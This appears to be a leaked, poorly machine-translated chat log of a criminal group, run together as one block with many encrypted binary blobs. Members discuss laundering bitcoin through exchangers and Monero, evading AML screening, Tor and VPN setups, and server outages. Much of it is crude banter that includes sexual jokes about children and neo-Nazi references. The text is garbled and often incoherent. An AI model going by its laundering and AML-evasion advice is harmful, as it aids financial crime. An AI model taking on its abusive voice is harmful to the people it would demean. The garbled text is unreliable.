-Tomas. He is a steamroller.) Paravozik) +Git is still there? I do not have, I am also waitingGit works? went away. will be back within an hour: vulcan: who had it so that the settings elektrum slipped? hype hype hurray)) Productive week all! HOORAY GUYS!+Good {"$binary":"xkiU6xfgDOJGMwiaW6prew4+56fW/+whX+17MYtHwUbNJdPW6VXe4PFWnIJGVTCC54d/BcRq2dCxr50Wt8b2TTZ+4dSL4HX9XFgDsQkWn77A0mob2STxq8+IyNmX5A16iioQ9iIMPysEITO5VuA1hlKeHQaicsnJ2SmH8/hEPqQAh2SxF7C4PDLmJGliUsL8P5B6fnby9SiouWOMd0CZQQYaalFRen7nZ3QhB56fRQ=="}{"$binary":"3+Hc7TIFqs3VblZ9nAyUYhhZEmNoq6d8soTqoveJ21a42iUEjEtopvOAZr0c29QyzgHcDBckGwDOVrbBjlzu5XAaXxRLt3Tcps3QGUxttw38UtW02GwEhK2QqVO6/d3UJdb9oTt//CLfjyx7xu1kohpaqS42/kAgx3uEaDbnwsMWKx3eNsKnjpxTCUQ+t9KG7S0Xxahrc/HBjWFSlci5W/kuRThKPwEA6NzhCK0/wmBgxXlHLkiGUQqYGjXyV16FP6fnqGe9GVfXlKqCvxuahnLCUHdN7z3G0KT7feN4WP6v1qjijWAwCUeODSR4yVWt8dBvhDgn6QhQE1/QxO2q37dTB5hO6I+iZc2G8am7B125nZTJC0L7zmv7cMiRnoI42XY9DgKFxvG6PmHcbQwHblN3TxKUGUe1WvMk3WcSpWDwcxuJLdlP0tQ4Bmf0BGnsEq+njNrY182L8xA1RN+2axombcOwbkyTp3xRDq6IbwUBkeEX2A/XDvrefeZCPjGkTJSFxtRTfMPxXNGdIwejd7DKAYrVJIsgwPC6zDHHbNkW/beWPCXz97rnYw9CI/7LhcoYU6RG5IrFdcLiDlT8+Iz/+MTU8RNcOHp2XhH9CVzD5txoVIHKTZcdnzcAqW3S84Z/Rhr343CbxqIvJih3QdDbyok0sfeYbWGVNYZ/fe8ft6nqvtgoNR3oYjzx3LHQN0B3L9ZvOqkU4V+0UgWlGblrxK0xoZQYYBd9wWlOjCvbQ0NTqlch8HLONdqu9B4d/38CSiZYdo6PU3EbteuB1cjIwZgW6EX5ZtgvahtaEw4/gwPCd/V31Re/A50ccyiPlPsXDKjP"}{"$binary":"/OB6T88tvPvMqqgkdcIrJFknrf6+HMroaP76vbbU7++l8gyQ5PDtNFqi6waYUJnA+DwqPlBc5ACmMj4Pj/eAVE3KhUob5I42WzTdgWWnyhzFZwWFVJBbXcyqKsexkRug+jXPA7vdMN76rICRpRNlAndDHgZ7oXrMHnHIonvX0Bf2d1pU94p+s2KdBpt2KikJnRDMOKlGbZHA8J6hWevE53Lx+BGAFrFwoKe+"} running, running brots who have not yet received - write to pm:)what a pain in the ass ! Guys, loosen your frenzy !)I am out, sorry)) well, I hope so. the second day today, he was only a day away) Force Majeure probably) whether something happened, usually warned if he would not be his donut - long time no communication with nimon the mostagasezar or what?and who knows where the hof disappeared? what is the scheme? as usual you can create a wpn + tor-browser and `https://www.bestchange.ru/` ??? really, as in a hole fell through) for BitKoshDosiliDosil ((and immediately disappeared :) @all Dear colleagues, you can start :) Throw at once kosh and the amount in btz, I will admit there by zp? no bitcoins, but you hang in there I do not know where the correlation ...))https://kod.ru/5885/ As 90% of the bitcoins are already mined, pure bitcoins - a myth, imho ... Cases were, the last couple of months is 1-2 people who have such problems. But all seem to solve them, leave a little more percent of the exchange and all the norms. The answer is the same, Chef says that in part yes, but now is a very strict system of verification - and just what the exchange does not like they can lock your tranche. Many exchangers either just return the funds, or protyat additional 5% for withdrawal from the origin of funds but it has nothing to do here...by the way, under Mars and fell, after the update - normne Mars vpn what do you?  (I have a mars)no, just the vindo-version at hand11.0.2 (based on Mozilla Firefox 91.4.0esr) (64 bit)encountered only in the vindo. men, I do not know what to answer, but were "Your tab just fell down." and after the update - did not fall tabsI in 11.0.1 fell tabT.i.e. in 11.0.2 repaired already, does not fall down? but it was, in the wind, in the last version of the tor-browserThe second tab does not even hang for 10 sec (your tab just fell down.)i had no problems with chatting latelyOverly falls like i do not know what ...I don't see any problems with chatting todayChat crashes hard, tor is stable on the netwatchwatch...i have updated and working stably i don't see any problems so far, it works like before, but i have tor browser without update...the same thing i have to ping.. the very tor works differently, imho(thx + tessnetu me one today chat constantly knocked out? shttp://audia6.best/a can you give a link....? audit the same, etc. no questions where to send what for exchangers? hydra lies, because tor does not pashaet, will not be bobs in treasure :sweat_smile :rofl:well, in Monero) Not the point, aml and other stuff only on the off exchangers with cone commissions) In this scenario, you need a bum to make him get dough in the Tink exchangers in qr tink you can withdraw and the percentage is less than at bestchange)))))) in the country, if a corpse in the country - yours, if oil - the stateNo if they catch you digging, you say looking for treasure, though 25% already ....I never understood the law, but there is so much money (Or how much is it...25%? Where are you going, honey? - You won't believe me if I tell you), and you will officially find the treasure, but soon we will be looking for money in bookmarks) Add to that the problems of banks that check transfers. They are strangling our brother !They did not invent the "nft-token" for nothing, they need to think about this laundry variant..The crypto check is very crooked, and only gives them an excuse to fuck up and take the dough. Transaction in the middle risk zone 👆
Risk: 59.7%

Detailed analysis:

✅ Minimum risk
  - Exchange ML Risk Low - 5.2%
  - Miner - 1.6%
  - P2P Exchange ML Risk Low - 0.4%
  - Payment - 0.4%
  - Wallet - 0.4%

⚠️ Average Risk
  - Exchange ML Risk High - 6.5%
  - Exchange ML Risk Moderate - 18.2%
  - Exchange ML Risk Veryhigh - 1.9%
  - P2P Exchange ML Risk High - 4%

⛔️ High Risk (Volume: 0.27675881 BTC ~13183.01USD)
  - Dark Market - 2.7%
  - Exchange Fraudulent - 0.5%
  - Mixer - 56%
  - Stolen Coins - 1.8%

Warning.
Since there are high-risk sources in the results (Dark Market, Dark Service, Illegal Service), we recommend 🔬 Investigation regardless of the overall risk assessment.
There's a blacklist of coins that are blacklisted - let's say there are several transactions backward in the chain with these coins, but this only applies to those who sent and received coins exactly in that transaction, the rest transactions are not known for what - and the system immediately considers all subsequent ones dirty even before committed with these coins)). Ganesh, what were you doing with kosh, tell me about one nuance. I checked with amlbotu I really had a 100% risk of mixer written and I exchanged BTC for XRP, but the exchanger blocked the application and said that he could return it after verification, because I had 100% rice, I don't know if it was a 100 percent rice, but they would have returned it with a commission and without a raiffMonero and XRP in the same sentence is fucked up, but the AMLbot site has a list of participating exchangers and they don't have a raiff or anything else[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=d3nYGSpfa5Y35yyphz) yes, or for the refund konuyuyu commission tooktopankiya wanted to exchange for money yesterday at Baksmena so I obschenik said that you have a 100% risk and to return the need to be verified )))) amers now block again exchange kakogodekom and they, I don't know if it's a good question about cryptocurrency purity, I've noticed it quite casually, but I haven't checked it at all before. But the exchangers have never checked for dirty cryptocurrencies. I bought pot, threw it on the seller's wallet, and your wallet is blacklisted now. i wonder what will happen next, in two years? wasabi wallet is blacklisted. that's why i brought up this question...maybe the wallet transaction analysis, and there is a blacklist of wallets that are blacklisted. this is just a kind of a traffic circle fuckup. this is how they determine the purity of Cristal or AML - it's their subjective opinion, the purse does not say what exchange they are from Any group has its mixer a year ago was the answer - "it's a very good question ..."I understand that this applies to wallets, which are sewn to the exchanges ... purgeWhere do you get it?) @frances, Bro, tell me, we have a crypto purge somehow?
What's the point? He could not look in the blockchain?)) from the point of view of mathematics and mine)) - there is no pure bitcoin left in some exchanges write more than 40% badly exchangers in the rules do not write that for them pure crypto` go it is necessary to check on amlbot` - I checked the wallet, shows 56% for example (average risk) and then what is good or bad is clear, but there are different exchangers + mixerspochtny circle through the exchanger that your bitcoins check all the same i change to moneroa it is probably better to change everything to moneroa why do you take for one kosh, i always use different ones, i need to check on amlbot, not if the hash has blurred the deal - my changer asked for hash\hash of the last tranche, only after that he agreed to accept the money, explaining fear of own wallet location i felt sorry for 300 bucks somewhere i just returned the bit to another wallet, but i have not contacted them againcheck the hash from the purse you want to verify:better check the transaction3 months have not yet passed, waiting for what will eventually be http://amlbot.com/
I have a question, can I verify the transaction myself? I have a question, can I check the purity of my bitcoins myself? Well, as they write in the rules, they can also send you to the authorities) you will be sent to the forest to get a bot, and if it shows that your crypto is dirty, even in previous transactionsOne exchange came across CrystalBlockChain
In one exchange, CrystalBlockChain refused to change my bit, but it was in April, what's the point? it's not a throw-in, i got screwed by payroll a month ago, bros, who met this throw-in, the crypto-men started some kind of AML check...?
> although on the git they say yes
It is written version 0.2.13 is not susceptiblevse need to be vaccinated, then the connection will be better. i'm here injected, and catches even without internetvery likely)) this promotional move for the release of Matrix 4mda, 3 day i observed a "quiet loss of connection" with rocket, ie.i think i'm in the chat room, but it's not true(((@angelo, look at yo jabber, plz! hi aLLthough on the git they say yes it's not fixed i'll be in a couple hours
the group chats are being worked onmattermost proprietary we're betting on toxhttps://security-tracker.debian.org/tracker/CVE-2021-44847@silver https://blog.tox.chat/2021/12/stack-based-buffer-overflow-vulnerability-in-udp-packet-handling-in-toxcore-cve-2021-44847/в tox messages only come online, mattermost is a good alternative, they're developing nowvideo, from what I hear, just tox is bad with group chatsthomas++:thumbsup:+a couple hours nothing to post, please Let the message be read and it will fall into history
If somebody needs something for personal affairs (it happens), he is obliged to warn all those who work, in working channels - "I will not be here tomorrow from ... to ...".
If a person is absent without a valid reason (illness / death) - minus half of your salary this month
two times repeated - goodbye
regardless of rank and merit passes an hour, two, three, it is not, deadlines are disrupted, customers resent and curse us, a man is missing, he is not, he is waiting for the guys, we have an extremely inefficient way of working when someone is not suddenly at workplace@algitler kaput, Stalin gut)yo, genau)guten)morgen)eyJhbGciOiJBshGoEq6rQiOssG/LXffdPDcgMAUM7VB5WUmnrHqejW4ZAyOQt7bLCE9RSuVsuOBPoeEKEqUdhnmqphDXZqpUEn566Vce/QBMI1IvuLz3ntzeFQ1118kwmwp/O5bfRO4xHe1GG8F0QB1XxmPw0slI51W8nwsPfVViXlE0JjoMS4ESGu2k7h4I9X7hAoNcmgA2eyJhbGciOiJBS56HFfjPfBTU9AHXZW//PZjCSP6RwI+XAA/IFFBhd+dgel3k4O3xSy/PdqPF0VDt0tJmopdGhJMgdipShvzZDLd+XF+GsdCzmtLNC6TldOQTfW2WWH96AZjh0cN6DX5dX9OSrMwbsf37/QwHhmWldkyBWYgRXKMcpOQtmWXngGauPWjjG5i412/HXqfZdeeZgQQDjffdNOtqnsNvsDw2Y2R1c68g+1HZXFtWQ3+Xt2hc0cylp9Tc9/zaQwyDh+Zjc0Nlw+RoEOr9grcg79bv4aTwnfn/r4LJfuD5FDaAJDiDBgjhZTDhfZiIl2G3QkEa8XN/nM4UxdAntnLfaWvosfnCBMYAd0HcmJaYtIcY+nwDI3ybP32q/VVlVAFcD4d0hiBbWv7ZefXQm7hunzG0NQQedERwOyNhpfimavg8cbRUawLLnN3fOHFIE289znjwdGVFq2hfILC4OAu5aazeANrgGfuTDsJEVhBh+up9JS2bS5BGa3smi33zdGMMtFsmC5q1EnlK1Ruc1D2QAc5zkZbcyTBJjQB9T9Hlx1iNZSrhAx0abAAb6JGamWeACuRtmxW2WxeSigPTh+XKq7PooVFxkbixDj2AzlIpbfaH8Qg2/Si0k7AOOf98dBSUnl+euLMnjNFchUAO4MkNI9fEMObo+bSMhEi9eUU2I80SuwSbZqCg7MCHfKTn1GDuXhWS4I674oN1Ve5zb6m1yiMGLcnSvLoF/bTuzXgFsofMMuKqtaYrV89+ULdLithmQ/vqG/CSwZtxT81CXlnBoVRox fail2ban just in case, Somebody was loading passwords on one server managed to login -- a bunch of sshd [defunct]processes didn't open the main page at all dns..12 hours since morning was downtex, deinserverhost.de hosting is up, PMS, he doesn't have VPN it's baidenugu(looks like everyone from toad kicked out our mars works, I sit through it now thought, rosompozor is weird with VPN blockers I have VPS there with VPN not responding http://deinserverhostde/ seems to be, в даунеeyJhbGciOiJB1gDhB4oayMj+NlzRt4xtFdd9tzOavCG3JRO+rXfuKMl6PwXLSMIJfkIEX3f9Td6YEgHcIH9lfz1lETQCMzYjJXrsSYHqzxmdguB101v1X5Ke2+wJ9wxGH5hTvDZUltH+DK/5j+SituJenKr5VJWl5OCxKYwPp7X86lj0wgSEcINoFnH1THU+sq1ZRvQv8HAV5D8NhSnD/5B+XBC2BcBLmN0KQhQm0LXdJFsxo8GKJbI=eyJhbGciOiJBC8JMMNZy07K5ug5K5risEvagG29764vQt/VL5tzk1KLU1Z296Iq6ICO6EVn7Ji5wmulduz9UE5I+HReDDLVV20NU0QFZWeXbeFcgqlFnWVgKsi3826/iehmrN+zhPp7QPzyNWXyMbjwJslstdcUNdWvcDm88kusr2M2ObotOC8KCl9hTgpthJPuHwpwZNmhCT4ux7ihJ8dvTvoqHlRcqsA==eyJhbGciOiJBxS+usJjet2dvZlagRLMU6qGLFzQQNyHeNtxyOMbRIXLK8dFb0Qf/yxmy20NsPt4tzcURllkKEj0eFui7Wr7fBbbDgOSR+hMrPG6sqJNsWdSUofL4Eb7nIHBX3ZwpsakaETgtxeN8D0FqIuVVgDgzlCWPRgSSt/91is1gviSayBo=eyJhbGciOiJB+C0itfRQVFybWTbVc8q7lzYxU9sGBn+7CXHOAULoE0eDi0kLqSCmwIP8QJNo+i6uDXElLsmSiC4SAG0uCOg2omLNse5Y49Z2E2yh4Oo7IrXnO1IlNMpZSCf8u8QUWDBTuJZugYN3bM8/KWmj9DhtLpG5JZKKMWRT0fjGyT/wpiYbCi4CcRXGGrUfaexWGKCEeyJhbGciOiJBtIaO3wTlt008om+vj3/FEgp36iDUvp1HWWFbhSHX4ASEiX+9TDwObu0+B+4Z3bUi/cUMGJecsgO+R540nnwV3EEZ7D2HYE/NV9294PdvbRf2BkHLH4FMJWMpUmBGCE/nLgTbBKpeSy I don't really understand this correlation. Our prayers (yesterday). Weird... Where's the logic... A miner stops mining, it creates a shortage of crypto, it should go up...
Oil is getting cheaper, gasoline is getting more expensive... the exchange rate in the UZ and our sector in the fund, too, have given up sharply... I don't know where the bottom is... So bitcoins went down? Now they are good shorts on crypto and fandov market, they have 1/4 of the world's miners... Kazakhstan was 2 or 3 in mining Kazakhstan = bitcoin rate? +++ok just finishing rega in 30 min!debian 10 for bknado 10 wps for collinprivetripishite as you will{"$binary":"5B2hTRUzuLYjNW6WEh1qdujaXWV588nrhjLNvPnshiCk2X+yFw5jB6CIB/K+UpqWs7EnWmW8V8D+33NxdQtoMIGq9lj2h95jbUSvt3odStskdP9wa55tDNrs4ThYXVWtSiu2WEmzwFXIXzJnoOf5mG/OVmj0yb72UbyN8hxc1d9FWKGpRsKxgxgFFKjJzzMZTm5Vmy4iz+4CzZkbtFZQJwV7fcjeo2FA69DO9KaVSR8fU7dlKjPGCH+PGTOQuskhbHumXHM/WzjLhaPMULh2RQKUHHegfz8J2I4="}{"$binary":"tH3UZyzErSv5F6jBWovnAyFB2IBzt7IHCNqpKmfLEOjn0n2PWaIKKzA2O8dCVYMT4M2GkeFHg4tkfG8JqQ6rCeArRladV16h4n3fVk9/Y2l+fC85mcu061792MYO6b9fFb/63nGvIrD4nMNBGPPIvAE52LnEvaj7koyiydwS3cLi/shsFP2Q1vm1/Y2Wur/z7oruZCmhoFxyN0kCv8+NJijxdW39t3HYmP4iVcZTVgqMwSINc0TELYs0rHOwJeIOx3uSCrBGAT+/mNJzLSiQ2qGyzT1AEoaClAnUvhWRnVaP86I4kclEWRY/1DpRL++m3nBaJp/I65gKeoRjsdKfkD8CnIsWMfJpg8oranjv71CRQpca0hNEqncc4xAwaN1As/eBS2wQDd1E50BpwDDBYeK1PPY2HfoMGq3kGoQwwVTjo9spuBeRSFZRC78v5ajEFcMMH4xmHG47XNbuQNnoDUggv72g84bujryzialHjMyiP7JqXPaJ"}{"$binary":"DYtQtZOLsj/ry+rq/ELmCSZnwvHcPBfX+Ll/jsyJ0c25XvZE2b/L1vwI5D6c7obtl/YpukXhTmb9qdhjxEfbWgijYgtsibNdznDU6PF8sCoyRoBuUiT6RQ1MEPYrGJvNGChq7VxV+vMv73Ij2YRoMb/f+dEaIpwfwE0xUQchQtnL4c/sSLhNQy6g/L5D0V+yDv1wnq6AoJ5/bM592X5j10gLkjDmRjBdcc/GozbXfAf44aW7mVGba/IGo2xMoe3D3jYwwvb0aZ3mCZ9+2HORaA=="}{"$binary":"p99GBtl2YIhIF3OvrS9SRjeqdoy8NepcFClR8MahcGZNzWd2O3ivGlpWlXqpXM7ipLcjJxL2Ph0rsv+Z/khC5A5Nr+l/nnhS6AsT+SxnimX6Hb6FW4Gb6yLmlZpgxlyI9L9djdmSB5sh5LrT7XV0f0EBqhzqAfGGpvBJhwbplzRq1WCDFSKbN0Jm2NUesfrmEtxjaADI5JVOOyRiCk/D2r9L4fXOcSWKPfvlh0EARFAQro4PtYNf6w=="}eyJhbGciOiJBWG+FVZk06mKn3qPbshMjM2HHxcQGPY+v/Ev+EE38x8J2ELfeicGGaW0TP85VkYd1KWdLue7SWMZyttIWsnbDbEqaD00fOymtF6Zus/fZUkH5+HMkWfFLGbCKHdvsJDUg2zqDFrh+AlU8RqU/Cq2LrqknimpuF/4GEkz8dSZu4ZHYZNJmLlrYyBeuUwUIozBqeyJhbGciOiJBfzpRXwQgbGXJqiJRKdJl9wuPVwG69ndQl8C9A9mYwcu5LmDuBVDwTBLVF82NtT5I7RJtCdcMoTo48RRdP439LPp7tjgRC6g8Tt0wYN0+wUPhTs4oNeWvn7e0GHugAQOA1Pe383WCacXdyGyXXgXoWchobQWrUHeRYpHDfNDqrb7q/f2KOUqnhXhoCoi7mb8U07tH3lpIBMBeCuQ8Ne4/6SdLvgNQHPFVpSxRZurehQpdjbiP7DhhigUieqa5SOYIFcdBvZWhFmuaCTmyqEbLsE6D7UXh8tmtvPYyuJqKZ2jdLIhhpbsNPUdNLjyMlB/bIs02a837wKflYVfGb5m83tllB5MlELsfePyo1jPPcevsLsIqa37GK2hJDgd+wPmZmRQsuPXMfIzPORMa8iWM7AEXPeLSS9GetuAMakKjZ7fK39Z2H/UbMsIt6hwNT41el8mUoY+iHaEg+aZPvdtFn1esHpeBukoVXRaBJ8OJ7yP+jtojk1RGgMr24arfSIQcwVILDYXB9P76J8oxJDI+YOlVLagJjNOIzl+V7WbzV3c71"ZEqJ0hiB7wk9edxyjntcFRygHN4nJcQOBkpeZg+znTjU1z8wgcva1ZjgGf7Yv1ukp0dSYTss9uZyQmmkvozvIzh2fiHGH0f9tKCpobVvJ/GqhYAbmTYHVRdJhEw1bvx6hQIKeyJKYN6ckyxEjR4FEpmD4phR9nfgAHBilOZH3kH+D68/K1V+dTNVKy1QU8H2FeYcddjHKkz77ZKzpnLQ38d5Mam8iBYLKm0OlTOCmAPnqTmMbW1cliXLhsk7yKJrPoCn"}{"$binary":"J8S2cgvz6sg5tEeIXduQglzh8tWpPiDFnts+keqUPRP7j544Jqqi95kOLv7eKmE2TbcKrQt/FXrnMy8pR8soUgbhL5oxBvexP8ChK7/STc+TL+kc93Kh2jJ1THBwNELGGEP8kBrCQVdA0++yRuqviZI2Sua95xcdjW0Y6aFxe8VgSliXIaNkadtWwkzi5nIdgsgzU4TQPYJgkQJY93fkQ9LJdJ9JHxVJB+Q8nzIAyFvVW9PIZlOTPWJ3SRVLzRQsT6XEh+usXmpuLG79BL6dgV9MHIT1ybKCaajyjqQ2Gl9ZsbUHG/khQZ5nc5DUzVFEOOfJ9DzoBVfXYe1WDK6/lB8EOjNhbl2h/8l97M8Vud9M2v4bV5+2AmthwNPZS5xAKBqIYkL/c2kua6Q+TpV7GyaE7QwNbaAQmcpa9uVb3KkSdl2EtonypLlRm+hwFWnKJlFMc1b2Q3jlRBEwH17V9xJXqvxFYLtnzJJtrpKsc2ueLBl/ePiCoqC+snoQHqmwy/8Kwin3W5exhD0AcX5PVwXw4MpLB5ecoJ6uzjHS634U2zKGj/58Z1Uxj6pvMsno2PYbd9tsn4EKOStx9lhJnex/fYohhmnsG+Ax2p6LQbiFm2EHKXiAkgK/uZ11mKntQ1fKx3ByKicpK5etwAityQfiQGyRVdUX3MjtdIS7Lw=="}{"$binary":"C3VUuu3BEEV5WTp6C1ZVYgK6+63ZQdibWECg9/W+9CMSjhaU6zTw1RsGFyNw0U7U5hfk5P2bfDr27plgRMPM1rGWd4DjXJOzwctXvdkIeaDU2uuS8nB7PvkeO81hcBYxOObhb47eWG9hJNDpU7VcoFU6fahDOeyx1ItZyTeS6KInNXcXaN0BR+Yhcyip7Fcvx3+XXqpmNaZyOMgh0jBfsvpAFRkKziVt871I"}{"$binary":"jIZ7CcYQhdXL79tfvT53u4gXpFsT7uioblyrTZzz3cMSczZAvTR0WLqpnUDaFBu/PUgUh6G5oU5SsLSGsKmcReBgRJ8uDkBvLz/DAifw5XSlhUN3a311P8CB9gU4e+cmFo1sNS1lNOKso5F14Dsyb9o7e+QgTrK8MUunGkl3Ho5+Dsq2upM7iybV3REW9oR7n7jKmXsZ5V5egLAM76mTH05PYrfcT5G8UsXTMe8Zs0axMAccrny+VsqC/S9cVI+zojp+4J+RJSgY0y7OclRzTQ=="}привет!hi there://www.youtube.com/watch?v=HV7sjEDlMKsдобройдоброй night guys !all have a good weekend it's Thomas, I also know who to write if anything )I'm an old grandfather today and it's time for me to go to sleep, it's time to go to the rags zarazhay angelo)no problems full. Now if that I will know who by such gizmos sharit))) suddenly get a similar device will think about necessarily consult) and this is purely hardware, to be able to similar outputsamit nekrotikno to anonymize the Internet better to take a microticlasskoy thing he certainly and in the hands did not hold, microtic is a cool piece of hardware, it certainly does not hold in my hands, but I've seen many articles in the planning of an anonymizing netatok quickly crushed it in the bag crushed it, and it turned out very well I and a display for it touch sensitive uurvala in dns bought the 4th version in the dns also sawhere saw a funny video, where people coded on the keyboard where there is current 0 and 1k by the way, as that not so long ago came across on sitilinka Malinki, they have long been on sale there?))https://aliexpress.ru/item/4000050394000.html
but the quality is not known for a couple of inputs, without graphics with the console toknut here you can argue about the size of the only smaller, I do not even know who is smaller?) Arduino then malinky) @hammer while broy all so far, only I left good night and have a good weekend http://youtu.be/j_5XhBzMcQM?t=139 here's about that reel with the kitchen and why so happenta old hardda - such ooldy, I 5 shots have time to drink drink to pass out, sleep and rise again wanted to see T34 in 3D, it turned out there is no it on the old hardda anywhere I did not run away so fucking screams at the end))) flame I remember exactly what the fuck it fucked up from the squirrel how it so fucks it is not gasoline near the stove and open flame the smallest sprays of oil and water, everything is proven but it does not sound good and there was also a post on pikabe about why it blows so good the flame really fucked up the ceiling but i remember that i fucked up so bad i remember it to this day how i did not throw it out of my hands and shit i do not understand i had water in my oil and i ran away !like this guy) yes Eliot, we all did a fuckin' thing! Trance://www.youtube.com/watch?v=0pVnFoIyg5cмоим thank god it was over) found a video about the guy) if you catch it before the neighbors call the fire brigade) fuckin' stimulates active recreation and all the walls in flakes of soot and it was coming to the parents) teenagers in virtual work the kitchen turned into a cunt in real life, I was a friend of a friend of mine. But when I had an epiphany, my friend was running around in a fucked up state, because he thought of burning magnesium right in his own kitchen... I love him. Eliot, look at him, he had a friend like that. Everyone had a fucking friend like that. I remember the friend said, look closely at the light. it was magnesium with sulfur, i fucking thought i'd go fucking blind)) the can was on fire, you take it with a stick and start twisting it over your empty head you thinkers then)))))) you're lucky you poured it on your headHammer threw up a beautyһttp://www.youtube.com/watch?v=iRhs6ZZAGsA&ab_channel=%D0%B0%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80%D1%86%D0%B0%D1%80%D0%B5%D0%B2%D1%81%D0%BA%D0%B8%D0%B9тут уже горело охуенно, настолько охуенно, that I lost half of my outerwear and a couple of pieces of my body surface)his next idea was a can of paint and a future employee of RUSNANO !turned out to be nothing special):joy:I had to burn the fuck out of it. i remember only sixth grade and my buddy who used to tell me that when shit burns, it's somehow especially goritnostalgia is blind and not objective in relation to the object of nostalgia )and this too, by the way )burning paper covered in shit?i got nostalgia for shitting in the woods Fucking hell, a fucking bucket of shitty paper would have been better burned and you can't flush it down the toilet with your hand and then on the snow, it never felt so fucking good with the newspaper Who the fuck is a herd? It was fucked up before the era of toilet paper. I remember rubbing it in my hands and my ass feels good Not so, guys, sometimes i get jealous watching... at Silver's stamina... he's a real herd-head...i haven't even held it in my hands in 10 years) but i don't give a fuck if i read a paper i thought it was a paper, but it didn't come out where i clicked the link, it came out, i read a newspaper and a hohlian one too) you know, once they write, they can't even read. i read a hohlian paper today, a guy there said, I often have contacts with officials, in the government of Ukraine they can't make five sentences in a text, even if they are like Ostap Bender, do not confuse it, this is how we build ford roads, fuck you, I do not know how to play chess (if I beat Angelo with black from you, then your green flows to me:stuck_out_tongue_closed_eyes:it better be nhl who won?it was a couple weeks ago elliot and i are waiting for another one) who played that one?)welldon yourself play))))))))):rofl:or *payments* like *chess*, some kind of built-in toy would beWeldon help me out here. I can't. Guys, let's wank and continue the high-interest conversations. That's it, we're talking, now i don't even want to eat now i don't even want to eat more functional attributea your ass than your tits, 3 on your ass then 2 on your tits size 2 is idealsam not likesiksiks big not like prosecutor put 5 kilos on your tits) at least 5 kilos, bossa wellooooo it's normal he's a fucking pussy):You put a dick in her, you'll tear the skin on her belly. Have you seen 177 and 50 in person??that would be awesome guys. 177 and no more than 50. I want a brunette about 18 years old.and food - it's nothing I'm not used to, all by myself, with my own hands uncomfortable is when your prostitutes will start to order youHow uncomfortable, from the couch ordered all that you need and all:D uncomfortable but want to fuck as if to order prostitutesdostavka for foodthat for the fashion such?! My, my started ordering food with delivery) Stolypin vaginas?vaginas put out fires what kind of vaginas light vaginas? what else vaginas? vaginas unload vaginas do not burn out I'm still here and see everything !:grin: I remember in real life New Year 02 or 03 ) that's where the whole vagon burned out):joy:Fire this guyOut?I can't find the guy who used to represent cute girls instead of sheep, but I like commercials :joy:it was exactly righthtp://www.youtube.com/watch?v=1zgJnOXsBlY not and sheep about psa remember the video?!fuckahahahaha for all the oldies))))))))) you watch, i'm about to start asking questions like "would you fuck a sheep?"))))get it, from who is this tendency i read and it starts itching in my groin of course elliot !well what kind of people are all our conversations reduced to fucking and wanking it is because we are so fucking good, i guess?
"knock it off, i'm 33 years old and still a virgin."
"no, i have a girlfriend... "her name is Rosa... she's standing on a windowsill, winking at you all":smiley:so what else can i say) i can't remember the name, two years ago it was before the fucking covids - the best cunt cheese! "white-yellow-orange, who doesn't know that!i'm gonna make brie. i want my own, fresh, i don't remember the name, the white-yellow-orange one i tried, of course i don't mind spanish cheese either. What kind of cheese is that, no moldovan, Georgian or armenian? It's easier if it's soft. What can i do if i can get really good cheese and good cognac there? i'm a gourmet.If you can buy really good cheese from France with cognac, you can't buy fucking good cheese and I'm sick of buying cheese, it's bullshit, I've tried my best to listen to him, but dumplings fuck - the whole kitchen is full of flour, i'm like a schmuck, dumplings are like the dumplings of an old french prostitute in a bar) it's like jerking off, only the result is different and for a long time i couldn't help myself Turn on the movie and mold myself as a kid, now my fingers are not the same ..... all on the keyboard and on the clavette I really could hardly buy somewhere would be fuck knows you won't buy it you need to love life very much to voluntarily do this shit not once !buy it is more reliable, I'm sure once molded in the freezer 5kgs mold yourself a pelmeni already eh fucktastic I'm a log cook - now *BMZHIRAC* brew :smile:they have nothing to say if not pisichka:rofl:log cooks also have everything not only a log, but also a log-coder? they are not only able to be a log girl, I've even heard here long ago) even ! even female programmers {slash yeah, I don't know what I was saying there}:joy:yes, they have comments in the code like that, lezginka, taz, all that shit, I mean our, condos=) blackcoders Of course, such an immodest question, I hope they won't beat the fuck up... there are khachi-software guys? we need more black music in our itinerant everyday life and you can develop art music here) how lucky you are that i'm sober you can also sing ukupnik no way out, turn the key and fly aiiipffffluentially meaningful forever young - forever gay, who sings?)I wouldn't be surprised if he was still editing April thesesSilver is the youngest, it's me in the course Silvermans are all youngJewish logic !:joy:)))))))))))))))))))) all this is strange.You're here for fuckin' kids again, you're young, you have some kind of connection) @kermit come dear)):rofl:)))) Don't you have a brother in moscow?and all of a sudden everyone became a moron they used to be people like people ageperchy rolls not to blow people's brains out and i already gave up on the punching bag i have a punching bag helps 50 kg i was only 22, sometimes i fuck up)))))) i did not want to fuck up when i was 15 you know how long he was in prison? it's a glamorous and this idea is perfect when you're 15 and you want to get fucked up he was some kind of plush Nazi who wasn't one of us in our youth?! he was a fool, not a neo-Nazi. kids can be different. he was a neo-Nazi but the guy was a good man. you cry more from the comments there than from the post on picaboo you often cry from the comments with laughter, you wouldn't find it now, it's a shame.... Angelo, and even TESAKA bemoaned) I the comments rolled on the fuck) on the theme of tourism somewhere in the Thailand and fuck children, pikabushniki everyone thought of other kids fuck)) remember such a hilarious topic on pikabu was in the winter, like 15-year-olds there ogo hoe! I will make a footnote well well catch, tor, all that ...)))))))))))))))))))))))))))chats don't confuse-then you've made this shit up, you can't fuck kids...mine did for two kids and who the fuck knows from who, and you can get jail time for my roommates even though it looks like a prostitute) coronovirus is not sexually transmitted!!! as long as you're on the other side of the monitor:laughing:my roommate, for example, only gives it to the iranian)) no arguments it's so the topic will always be relevant I have such roommatesNow the world is full of fat, pimply men who will never have a reason to fuck their neighborThat's the pandemicWatchat for TV jerks?you should jerk off in real life ! what's the equivalent of a runetki ? what the fuck is a runetki ?msg=6SzdjFCong4vYuaPE) the same guythere are so cute compsvot votaa, well that's more fun, I guess I found the old don't tell him:rofl:what is it?!bongacamsEliot this old mac washttp://static.baza.farpost.ru/v/1629881092363_bullen translate plz, is it something laotian, judging by the name?I was offered to make up something like bongacams say in the pandemic as ever relevant :) yes, I see his fields are black and I feel bad you're all posotrines androids) such screens put in chinese cars like thought something missed. It's nothing unusualhttp://media.s-bol.com/LZzXZ980X0rA/1200x965.jpgbeautiful tvs for 100 fuckin' tvs are the same as the old tvs on a leg zhesuk colored still stands on themblin new iMacs are beautiful peepersystemic not very comfortable, i'm closer to minimalismnashe students often go to the EU and no dough left and what 